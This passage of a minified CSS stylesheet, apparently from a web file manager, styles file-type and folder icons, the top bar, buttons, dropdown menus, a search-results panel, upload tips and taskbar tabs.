\9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/dwg.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/dwg.png?ver=3.30',sizingMethod='scale');}.x-dwf{background-image:url("../../../images/file_icon/icon_file/autodesk/dwf.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/dwf.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/dwf.png?ver=3.30',sizingMethod='scale');}.x-dwfx{background-image:url("../../../images/file_icon/icon_file/autodesk/dwf.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/dwf.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/dwf.png?ver=3.30',sizingMethod='scale');}.x-dxf{background-image:url("../../../images/file_icon/icon_file/autodesk/dxf.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/dxf.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/dxf.png?ver=3.30',sizingMethod='scale');}.x-ifc{background-image:url("../../../images/file_icon/icon_file/autodesk/ifc.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/ifc.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/ifc.png?ver=3.30',sizingMethod='scale');}.x-iam{background-image:url("../../../images/file_icon/icon_file/autodesk/iam.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/iam.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/iam.png?ver=3.30',sizingMethod='scale');}.x-fbx{background-image:url("../../../images/file_icon/icon_file/autodesk/fbx.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/fbx.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/fbx.png?ver=3.30',sizingMethod='scale');}.x-rvt{background-image:url("../../../images/file_icon/icon_file/autodesk/rvt.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/rvt.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/rvt.png?ver=3.30',sizingMethod='scale');}.x-skp{background-image:url("../../../images/file_icon/icon_file/autodesk/skp.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/skp.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/skp.png?ver=3.30',sizingMethod='scale');}.x-vnd,.x-dgn{background-image:url("../../../images/file_icon/icon_file/autodesk/vnd-dgn.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/vnd-dgn.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/vnd-dgn.png?ver=3.30',sizingMethod='scale');}.x-folder{background-image:url("../../../images/file_icon/icon_others/folder.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/folder.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/folder.png?ver=3.30',sizingMethod='scale');}.x-folder-share{background-image:url("../../../images/file_icon/icon_others/folder_public.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/folder_public.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/folder_public.png?ver=3.30',sizingMethod='scale');}.x-recycle{background-image:url("../../../images/file_icon/icon_others/recycle.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/recycle.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/recycle.png?ver=3.30',sizingMethod='scale');}.x-recycle-full{background-image:url("../../../images/file_icon/icon_others/recycle_full.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/recycle_full.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/recycle_full.png?ver=3.30',sizingMethod='scale');}.x-path-self-share{background-image:url("../../../images/file_icon/icon_others/path_self_public.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/path_self_public.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/path_self_public.png?ver=3.30',sizingMethod='scale');}.x-app-link{background-image:url("../../../images/file_icon/icon_others/app_link.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/app_link.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/app_link.png?ver=3.30',sizingMethod='scale');}.x-user{background-image:url("../../../images/file_icon/icon_others/user.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/user.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/user.png?ver=3.30',sizingMethod='scale');}.x-user-self{background-image:url("../../../images/file_icon/icon_others/userSelf.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/userSelf.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/userSelf.png?ver=3.30',sizingMethod='scale');}.x-share{background-image:url("../../../images/file_icon/icon_others/share.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/share.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/share.png?ver=3.30',sizingMethod='scale');}.x-group-self{background-image:url("../../../images/file_icon/icon_others/groupSelf.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/groupSelf.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/groupSelf.png?ver=3.30',sizingMethod='scale');}.x-group-self-owner{background-image:url("../../../images/file_icon/icon_others/groupSelfOwner.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/groupSelfOwner.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/groupSelfOwner.png?ver=3.30',sizingMethod='scale');}.x-group-guest{background-image:url("../../../images/file_icon/icon_others/groupGuest.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/groupGuest.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/groupGuest.png?ver=3.30',sizingMethod='scale');}.x-group-self-root{background-image:url("../../../images/file_icon/icon_others/groupSelfRoot.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/groupSelfRoot.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/groupSelfRoot.png?ver=3.30',sizingMethod='scale');}.x-group-root{background-image:url("../../../images/file_icon/icon_others/groupRoot.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/groupRoot.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/groupRoot.png?ver=3.30',sizingMethod='scale');}.x-group-public{background-image:url("../../../images/file_icon/icon_others/folder_public.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/folder_public.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/folder_public.png?ver=3.30',sizingMethod='scale');}.x-tree-self{background-image:url("../../../images/file_icon/icon_others/computer.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/computer.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/computer.png?ver=3.30',sizingMethod='scale');}.x-computer{background-image:url("../../../images/file_icon/icon_others/computer.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/computer.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/computer.png?ver=3.30',sizingMethod='scale');}.x-tree-fav{background-image:url("../../../images/file_icon/icon_others/treeFav.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/treeFav.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/treeFav.png?ver=3.30',sizingMethod='scale');}.x-edit{background-image:url("../../../images/file_icon/icon_others/edit.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/edit.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/edit.png?ver=3.30',sizingMethod='scale');}.x-search{background-image:url("../../../images/file_icon/icon_others/search.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/search.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/search.png?ver=3.30',sizingMethod='scale');}.x-upload{background-image:url("../../../images/file_icon/icon_others/upload.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/upload.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/upload.png?ver=3.30',sizingMethod='scale');}.x-setting{background-image:url("../../../images/file_icon/icon_others/setting.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/setting.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/setting.png?ver=3.30',sizingMethod='scale');}.x-logout{background-image:url("../../../images/file_icon/icon_others/logout.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/logout.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/logout.png?ver=3.30',sizingMethod='scale');}.x-app-store{background-image:url("../../../images/file_icon/icon_others/appStore.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/appStore.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/appStore.png?ver=3.30',sizingMethod='scale');}.x-error{background-image:url("../../../images/file_icon/icon_others/error.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/error.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/error.png?ver=3.30',sizingMethod='scale');}.x-info{background-image:url("../../../images/file_icon/icon_others/info.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/info.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/info.png?ver=3.30',sizingMethod='scale');}.frame-fullscreen{position:fixed;z-index:999499;left:0;top:0;}.font-icon{font-family:FontAwesome;font-style:normal;color:inherit;}.dragMaskView{position:absolute;top:0;left:0;right:0;bottom:0;z-index:888;background:#fff;opacity:0.01;filter:alpha(opacity=1);-khtml-user-select:none;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;-o-user-select:none;user-select:none;}.content-box .ace_cjk{width:1em !important;}.content-box .ace_static_highlight{font-size:1.15em;}.aui-buttons button{font-size:1em;-khtml-user-select:none;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;-o-user-select:none;user-select:none;}.dialog-change-max,.dialog-change-max .aui-main{-webkit-transition:all 0.25s;-moz-transition:all 0.25s;-o-transition:all 0.25s;-ms-transition:all 0.25s;transition:all 0.25s;}.aui-title span{position:absolute;width:80%;overflow:hidden;height:30px;word-break:break-all;text-overflow:ellipsis;white-space:nowrap;}.less-error-message{display:none;}[class^="icon-"],[class*=" icon-"]{background-image:auto;}.btn-group-sm>.btn{padding:4px 10px;line-height:1em;}.btn{padding:6px 14px;border-radius:3px;box-sizing:content-box;}.btn:focus{outline:none;}.btn.btn-default .font-icon{color:#999;}.btn.btn-default:active,.btn.btn-default.active{border-color:#ADADAD;color:#888;}.btn.btn-left{border-top-right-radius:0;border-bottom-right-radius:0;}.btn.btn-middle{border-radius:0;}.btn.btn-right{border-top-left-radius:0;border-bottom-left-radius:0;}.btn.btn-lg{padding:10px 16px;font-size:18px;line-height:1.33;}.btn.btn-nomal{padding:4px 12px;}.btn.btn-sm{padding:2px 10px;}.btn.btn-xs{padding:1px 5px;font-size:12px;line-height:1.5;}.btn.btn-active{background:#63acff !important;border-color:#4fa1ff !important;border-bottom-color:#449cff !important;z-index:100;text-shadow:none;color:#fff !important;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#8cc2ff', endColorstr='#63acff');background-image:-webkit-linear-gradient(to bottom,#8cc2ff 0,#63acff 100%);background-image:-moz-linear-gradient(to bottom,#8cc2ff 0,#63acff 100%);background-image:-o-linear-gradient(to bottom,#8cc2ff 0,#63acff 100%);background-image:-ms-linear-gradient(to bottom,#8cc2ff 0,#63acff 100%);background-image:linear-gradient(to bottom,#8cc2ff 0,#63acff 100%);-pie-background:linear-gradient(to to bottom,#8cc2ff 0,#63acff 100%);}.btn.btn-active:hover,.btn.btn-active:active{background:#3a96ff !important;border-color:#268bff !important;border-bottom-color:#1c86ff !important;z-index:100;text-shadow:none;color:#fff !important;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#63acff', endColorstr='#3a96ff');background-image:-webkit-linear-gradient(to bottom,#63acff 0,#3a96ff 100%);background-image:-moz-linear-gradient(to bottom,#63acff 0,#3a96ff 100%);background-image:-o-linear-gradient(to bottom,#63acff 0,#3a96ff 100%);background-image:-ms-linear-gradient(to bottom,#63acff 0,#3a96ff 100%);background-image:linear-gradient(to bottom,#63acff 0,#3a96ff 100%);-pie-background:linear-gradient(to to bottom,#63acff 0,#3a96ff 100%);}.btn-group.disabled{opacity:0.6;filter:alpha(opacity=60);}.dropdown-menu{left:auto;right:0px;border-radius:4px;border:1px solid rgba(0,0,0,0.05);box-shadow:0 4px 30px rgba(0,0,0,0.15);max-height:400px;margin-top:0;}.dropdown-menu>li>a:hover,.dropdown-menu .this a,.dropdown-menu>li>a:focus{-webkit-transition:all 0.2s;-moz-transition:all 0.2s;-o-transition:all 0.2s;-ms-transition:all 0.2s;transition:all 0.2s;background-image:none;filter:none;background:#63acff;color:#fff;}.dropdown-menu>li>a{font-weight:inherit;color:#666;}.dropdown-menu>li>a .font-icon{opacity:0.8;}.dropdown-menu:after{content:'';display:inline-block;border-left:6px solid rgba(0,0,0,0);border-right:6px solid rgba(0,0,0,0);border-bottom:6px solid #FFF;position:absolute;top:-6px;right:10px;}.dropdown-menu:before{content:'';left:auto;right:12px;display:inline-block;position:absolute;border-left:7px solid rgba(0,0,0,0);border-right:7px solid rgba(0,0,0,0);top:-7px;border-bottom:7px solid #CCC;border-bottom-color:rgba(0,0,0,0.2);right:9px;}.dropdown-menu.menu-top:after{content:'';display:inline-block;border-left:6px solid rgba(0,0,0,0);top:inherit;border-right:6px solid rgba(0,0,0,0);border-top:6px solid #FFF;border-bottom:none;position:absolute;bottom:-6px;right:10px;}.dropdown-menu.menu-top:before{content:'';left:auto;right:12px;display:inline-block;position:absolute;border-bottom:none;border-left:7px solid rgba(0,0,0,0);border-right:7px solid rgba(0,0,0,0);bottom:-7px;border-top:7px solid #CCC;border-top-color:rgba(0,0,0,0.2);right:9px;top:inherit;}.dropdown-menu .divider{margin:0.3em 0;}input{border:1px solid #ddd;background:#fff;outline:none;}input[type="radio"],input[type="checkbox"]{border:none;background:none;}.topbar{width:100%;height:40px;color:#ddd;top:0;background:#63acff;position:absolute;z-index:auto;}.topbar .content{padding:0px;line-height:40px;height:39px;word-break:break-all;}.topbar .content i.font-icon{display:inline-block;padding-right:10px;font-size:1.1em;}.topbar .content .topbar-menu{display:block;text-decoration:none;color:#fff;border:1px solid #4a9eff;overflow:hidden;-webkit-transition:all 0.2s;-moz-transition:all 0.2s;-o-transition:all 0.2s;-ms-transition:all 0.2s;transition:all 0.2s;padding:0px 1.2em;border-top:none;border-bottom:none;outline:none;float:left;margin-left:-1px;font-size:14px;}.topbar .content .topbar-menu.title{font-size:20px;width:200px;width:202px\0;padding:0;text-align:center;}.topbar .content .topbar-menu.title:hover{background:none;}.topbar .content .topbar-menu .icon{width:25px;height:25px;margin-right:5px;padding:0;margin-top:-4px;font-size:13px;line-height:25px;text-align:center;background:none;}.topbar .content .title img{max-width:200px;max-height:44px;}.topbar .content .open .topbar-menu,.topbar .content .topbar-menu:hover,.topbar .content .topbar-menu.this{background:#4a9eff;}.topbar .content .menu-desktop:before{content:"\f108";}.topbar .content .menu-explorer:before{content:"\f0ae";}.topbar .content .menu-editor:before{content:"\f044";}.topbar .content .top-left.collapse{display:block;height:auto !important;}.topbar .content .top-left{overflow:hidden;height:40px;width:70%;}.topbar .content .top-right{position:absolute;right:0px;top:0px;margin-right:0px;height:40px;}.topbar .content .top-right .menu-group{height:40px;margin-right:-1px;float:left;position:relative;}.topbar .content .top-right .topbar-menu{display:inline-block;padding:0px 6px;margin-right:1px;}.topbar .content .top-right .topbar-menu i{padding-right:3px;}.topbar .content .top-right .btn{color:#fff;}.topbar .content .top-right ul a{line-height:30px;height:30px;display:block;padding:0px 1.7em;border:none;overflow:hidden;}.topbar .content .top-right ul a:hover,.topbar .content .top-right ul a.this{margin-right:0px;}.topbar .content .top-right ul a.this{background:#63acff;color:#fff;}.topbar .content .top-right ul .font-icon{width:18px;display:inline-block;}.topbar .content .top-right ul.dropdown-menu{margin-top:-1px;}.topbar .content .top-right ul.dropdown-menu.topbar-language{width:470px;padding:10px 5px;}.topbar .content .top-right ul.dropdown-menu.topbar-language li{width:115px;float:left;margin:0 1px 1px 0;}.topbar .content .top-right ul.dropdown-menu.topbar-language a{padding:0 8px 0 8px;height:26px;line-height:26px;font-size:13px;}.topbar .content .top-right ul.dropdown-menu.topbar-language i.flag{padding-right:0px;background-color:#eee;position:relative;top:1px;}.topbar .content .share-title{text-align:center;color:#fff;float:left;margin-left:8px;margin-right:7px;}.topbar .content .share-title-info{color:#fff;font-size:1.25em;background:#eee;background:rgba(0,0,0,0.2);border-radius:4px;padding:6px;}.topbar .content .share-info{color:#fff;float:left;font-size:1em;}.topbar .content .share-info .time{padding-left:5px;color:#fff;padding-right:8px;}.topbar .content .top-right div.share-info-user{margin-right:10px;color:#fff;position:relative;}.topbar .content .top-right div.share-info-user .btn-download,.topbar .content .top-right div.share-info-user .btn.button-my-share{padding:4px 20px;margin-left:5px;}.topbar .content .top-right div.share-info-user .dropdown-toggle{height:16px;}.common-footer{position:fixed;bottom:0px;background:#f8f8f8;color:#999;font-size:1em;width:100%;text-align:center;border-top:1px solid #e8e8e8;height:31px;line-height:32px;overflow:hidden;}.common-footer .copyright-bottom{cursor:pointer;font-size:1.25em;color:#aaa;text-decoration:none;}.common-footer .copyright-bottom:hover{color:#f60;border-bottom:none;}.desktop-widget{z-index:10 !important;}.do-search-box{color:#888;}.do-search-box .search-header{padding:10px;padding-bottom:0px;}.do-search-box .search-header input[type='checkbox']{padding-left:0px;}.do-search-box .search-header label{font-size:1em;}.do-search-box .search-header .btn-right{margin:0px 0 0 -2px;height:25px;width:30px;padding:0;height:28px \9\0;position:absolute !important;}.do-search-box .search-header .s_br{margin-bottom:8px;line-height:25px;}.do-search-box .search-header #search-value,.do-search-box .search-header #search-path,.do-search-box .search-header #search-ext{height:23px;height:27px \0;border:1px solid #ddd;background:#fff;outline:none;box-shadow:inset 0 1px 1px rgba(0,0,0,0.08);-webkit-transition:all ease-in-out .168s;-moz-transition:all ease-in-out .168s;-o-transition:all ease-in-out .168s;-ms-transition:all ease-in-out .168s;transition:all ease-in-out .168s;width:125px;padding-left:10px;padding-right:10px;margin-left:5px;}.do-search-box .search-header #search-value:focus,.do-search-box .search-header #search-path:focus,.do-search-box .search-header #search-ext:focus{border-color:#75A1F0;outline:none;box-shadow:0 0 4px #75A1F0;}.do-search-box .search-header #search-value{width:190px;margin:0;padding:2px 5px 0px 5px;padding-top:1px \0;}.do-search-box #search-is-case{margin-left:10px;}.do-search-box .search-desc{height:30px;line-height:30px;text-align:center;font-size:13px;margin:0px 10px;border:1px solid #ddd;color:#3196e6;background-image:-webkit-linear-gradient(top,#fff,#def);border-top-left-radius:3px;border-top-right-radius:3px;}.do-search-box .search-result{overflow-y:auto;overflow-x:hidden;position:absolute;top:137px;bottom:0px;right:0px;left:0px;margin:10px;border:1px solid #ddd;border-top:none;-webkit-transition:all 0.2s;-moz-transition:all 0.2s;-o-transition:all 0.2s;-ms-transition:all 0.2s;transition:all 0.2s;}.do-search-box .search-result .file-items{list-style:none;margin:0px;padding:10px 0;font-size:13px;}.do-search-box .search-result .file-item .file-info{height:25px;line-height:25px;cursor:default;padding-left:10px;font-size:13px;color:#444;position:relative;word-wrap:break-word;word-break:break-all;overflow:hidden;}.do-search-box .search-result .file-item .file-info:hover{background:#eee;}.do-search-box .search-result .file-item .file-info .title{height:25px;color:#666;padding-left:5px;}.do-search-box .search-result .file-item .file-info .title:hover{border-bottom:1px solid #1387bb;cursor:pointer;color:#1387bb;}.do-search-box .search-result .file-item .file-info .switch{width:20px;height:20px;display:inline-block;text-align:center;color:#aaa;font-size:14px;}.do-search-box .search-result .file-item .file-info .file-icon{display:inline-block;width:18px;height:18px;}.do-search-box .search-result .file-item .file-info .file-icon img{width:100%;height:100%;}.do-search-box .search-result .file-item .file-info .result-num{margin:0 5px;border-radius:10px;background-color:#dfeaf3;color:#666;font-size:12px;padding:3px 8px;font-weight:bold;}.do-search-box .search-result .file-item .file-info .goto{position:absolute;right:0;top:0;width:30px;height:25px;line-height:25px;text-align:center;color:#bbb;background:#fff;cursor:pointer;-webkit-transition:all 0.2s;-moz-transition:all 0.2s;-o-transition:all 0.2s;-ms-transition:all 0.2s;transition:all 0.2s;}.do-search-box .search-result .file-item .file-info .goto:hover,.do-search-box .search-result .file-item .file-info:hover .goto:hover{background:#fbbc00;color:#fff;}.do-search-box .search-result .file-item .file-info:hover .goto{display:block;background:#e6e6e6;}.do-search-box .search-result .file-item .keyword{background:#ffef65;color:#000;}.do-search-box .search-result .file-item .result-item{list-style:none;margin:0px;padding:0px;}.do-search-box .search-result .file-item .result-item .result-info{height:25px;margin:0px;padding:0;line-height:25px;padding:0 15px;cursor:default;overflow:hidden;white-space:nowrap;text-overflow:ellipsis;}.do-search-box .search-result .file-item .result-item .result-info:hover{background:#eee;}.do-search-box .search-result .file-item .result-item .result-info.this,.do-search-box .search-result .file-item .result-item .result-info.this:hover{background:#63acff;}.do-search-box .search-result .file-item .result-item .result-info.this .line,.do-search-box .search-result .file-item .result-item .result-info.this .search-info,.do-search-box .search-result .file-item .result-item .result-info.this:hover .line,.do-search-box .search-result .file-item .result-item .result-info.this:hover .search-info{color:#fff;}.do-search-box .search-result .file-item .result-item .line{display:inline-block;width:32px;margin-left:7px;padding-right:4px;text-align:right;font-weight:800;color:#aaa;}.do-search-box .search-result .file-item .result-item .search-info{font-family:Menlo, Consolas, source-code-pro, Monaco, 'Liberation Mono', 'Ubuntu Mono', Courier, 'Helvetica Neue', 'Microsoft Yahei', '微软雅黑', 'Lantinghei SC', STXihei, WenQuanYi, sans-serif;color:#444;}.do-search-box .search-result .file-item.open .file-info .switch .icon-caret-right:before{content:"\f0d7";}#maskViewContent .upload-tips{text-align:center;}#maskViewContent .upload-tips .icon-cloud{opacity:0.8;}#maskViewContent .upload-tips .icon-cloud.cloud2{font-size:180px;}#maskViewContent .upload-tips .icon-cloud.cloud1,#maskViewContent .upload-tips .icon-cloud.cloud3{position:absolute;opacity:0.6;}#maskViewContent .upload-tips .icon-cloud.cloud1{margin-left:-60px;margin-top:110px;-webkit-animation:moveLeftLoop 8.0s infinite ease-in-out;animation:moveLeftLoop 8.0s infinite ease-in-out;}#maskViewContent .upload-tips .icon-cloud.cloud3{margin-left:-50px;margin-top:60px;font-size:60px;animation-delay:4s;-webkit-animation-delay:4s;-webkit-animation:moveLeftLoop 10.0s infinite ease-in-out;animation:moveLeftLoop 10.0s infinite ease-in-out;}#maskViewContent .upload-tips .cloud-moveup{height:70px;}#maskViewContent .upload-tips .cloud-moveup i{position:absolute;margin-left:-23px;margin-top:-16px;}.task-tab{position:fixed;bottom:1px;left:0;width:100%;height:30px;padding-left:50px;z-index:100;background:rgba(0,0,0,0.1);border-top:1px solid rgba(0,0,0,0.15);color:#444;}.task-tab .tabs{height:100%;margin-right:20px;margin-right:60px;-webkit-transition:all 0.2s;-moz-transition:all 0.2s;-o-transition:all 0.2s;-ms-transition:all 0.2s;transition:all 0.2s;}.task-tab .tabs .tab{float:left;height:29px;margin-right:2px;white-space:nowrap;text-overflow:ellipsis;width:110px;border:1px solid rgba(255,255,255,0.4);line-height:30px;text-shadow:0px 0px 0px #fff, 0px 0px 4px #000, 0px 0px 5px #000;color:#fff;border-radius:3px;cursor:default;overflow:hidden;font-size:1em;box-shadow:0 0 6px #666;padding-left:4px;word-break:break-all;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='rgba(255,255,255,0.3)', endColorstr='rgba(255,255,255,0)');background-image:-webkit-linear-gradient(top,rgba(255,255,255,0.3),rgba(255,255,255,0));background-image:-moz-linear-gradient(top,rgba(255,255,255,0.3),rgba(255,255,255,0));background-image:-o-linear-gradient(top,rgba(255,255,255,0.3),rgba(255,255,255,0));background-image:-ms-linear-gradient(top,rgba(255,255,255,0.3),rgba(255,255,255,0));background-image:linear-gradient(top,rgba(255,255,255,0.3),rgba(255,255,255,0));-pie-background:linear-gradient(to top,rgba(255,255,255,0.3),rgba(255,255,255,0));-khtml-user-select:none;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;-o-user-select:none;user-select:none;}.task-tab .tabs .tab.hover{filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='rgba(255,255,255,0.5)', endColorstr='rgba(255,255,255,0)');background-image:-webkit-linear-gradient(top,rgba(255,255,255,0.5),rgba(255,255,255,0));background-image:-moz-linear-gradient(top,rgba(255,255,255,0.5),rgba(255,255,255,0));background-image:-o-linear-gradient(top,rgba(255,255,255,0.5),rgba(255,255,255,0));background-image:-ms-linear-gradient(top,rgba(255,255,255,0.5),rgba(255,255,255,0));background-image:linear-gradient(top,rgba(255,255,255,0.5),rgba(255,255,255,0));-pie-background:linear-gradient(to top,rgba(255,255,255,0.5),rgba(255,255,255,0));}.task-tab .tabs .tab.this{filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='rgba(255,255,255,0.7)', endColorstr='rgba(255,255,255,0)');background-image:-webkit-linear-gradient(top,rgba(255,255,255,0.7),rgba(255,255,255,0));background-image:-moz-linear-gradient(top,rgba(255,255,255,0.7),rgba(255,255,255,0));background-image:-o-linear-gradient(top,rgba(255,255,255,0.7),rgba(255,255,255,0));background-image:-ms-linear-gradient(top,rgba(255,255,255,0.7),rgba(255,255,255,0));background-image:linear-gradient(top,rgba(255,255,255,0.7),rgba(255,255,255,0));-pie-background:linear-gradient(to top,rgba(255,255,255,0.7),rgba(255,255,255,0));box-shadow:0 